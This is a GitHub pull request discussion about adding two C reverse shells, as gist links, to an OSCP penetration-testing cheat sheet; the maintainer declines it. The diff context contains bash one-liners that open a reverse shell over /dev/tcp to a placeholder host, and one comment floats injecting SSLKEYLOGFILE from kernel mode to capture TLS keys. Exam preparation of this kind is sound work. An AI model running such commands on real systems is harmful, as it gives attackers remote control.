### PR TITLE
[+] [+] 2 RevShells 

### PR DESCRIPTION
**Pull request by loneicewolf**
## Hi!
First of all; I was sure to read and re-read [the CODE-OF-CONDUCT](https://github.com/0xsyr0/OSCP/blob/1b645313de71cb39318e17bf853d44673e3cdc0b/CODE-OF-CONDUCT.md) And made sure this would be a actual "good" PR. Not just a "PR" to try to help.

## What I did
```diff
+ C Linux RevShell 
+ C Windows RevShell 
```

### Before any major contribution:
Before doing *any* major contribution I make a small contribution first. As I always do.
So I only added 2 reverse shells, along with their Further reading links.

### Feedback & Criticism
Please, if you (or anyone) find any error, or something that can be improved with this PR, do **point it out**! I am very open-minded and ___I accept all kind of criticism.___ (__it doesn't even need to "sound nice" as I only care about the "criticism" itself!)__ <- saying this to make it easier for any critic to explain their concerns on this PR. It's all okay for me. ❤️ 

### Future Ideas
I am having future ideas, namely Improving the format   from  \`\`\`c  to \`\`\`(whatever_lang_it_is), and add loops to iterative-behavior (code that is repetitive but could be looped, simplified, improved and automated), Cryptography(Implementations,scripts,sources,POC's, and stuff, like Cryptanalysis And Steganoanalysis)
Examples of the Cryptography parts could be:

- A SSLKEYLOGFILE program that injects the SSLKEYLOGFILE variable to the chosen process from KernelMode, to Grab the master secret keys. How is this related to the OSCP? Well it shows knowledge about cryptanalysis and Active Cryptoanalytical and Kleptographical attacks.
- Obfuscation
- Steganography

### CODE REVIEW

File: README.md [hunk 1]
```diff
@@ -5475,6 +5475,74 @@ bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
 echo -n '/bin/bash -c "bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"' | base64
 ```
 
+##### C Reverse Shell
+
+```c
+- https://gist.github.com/loneicewolf/8232aad5722e1e7de9d92932b5a01597
```
Comment (loneicewolf) [inline README.md:5481]: Further Reading

**Comment by loneicewolf** [comment]
Edit: by accident started a review,I wanted to only make a comment.

**Comment by loneicewolf** [comment]
# important
# Do not rush this! `take all the time you need`

**Comment by 0xsyr0** [comment]
Thank you for your contribution @loneicewolf! I read your suggestions and give you feedback on it.

- "namely Improving the format from ```c to ```(whatever_lang_it_is)"

This makes sense is some cases but for example if I combine commands executed on cmd.exe and write down the same command in PowerShell but in the same code block, it bricks the consistency. This makes sense for payload templates etc. and I will think about it in the future. At the moment I prefer a clean consistent structure.

- "Implementations,scripts,sources,POC's, and stuff, like Cryptanalysis And Steganoanalysis"

This is just not part of the OSCP and for that I will not add any unused techniques to the cheat sheet. It contained some stego and forensics examples when I first started this repository but it makes just no sense to blow it up with unnecessary information. This is a bloody breakdown or some kind of survival sheet for the OSCP, trying to cover as much as possible topics which will be part of the exam.

- Reverse shell contribution

```c
- https://gist.github.com/loneicewolf/8232aad5722e1e7de9d92932b5a01597
- https://gist.github.com/loneicewolf/03d71d65735d8b2d34b5c60b1232d144
```

Unfortunately I also will not add your examples even when I like them very much. The reason is that besides the fact that I don't have a `CONTRIB.md` which clarifies the format :) (sorry!), I try to put useful information in one place and reference as little as possible so that people not need to jump to several other repository to find what they need in the heat of the exam. A good example are the Awesome List repository in it's pure nature. I really don't like them because they just gather links and a lot of them are just fire and forget approaches.

I hope this makes sense to you and anyways, thank you again and so much for your contribution!

**Comment by loneicewolf** [comment]
Of course! it makes sense, and No need to apologize.
Although I cannot understand the first explanation of the code block (but no need to re-explain it) It's totally okay! 
Thanks for your time in this PR, and as always - Good luck with everything you and your team do!

Wishes,

Will.

**Pull request closed without merging**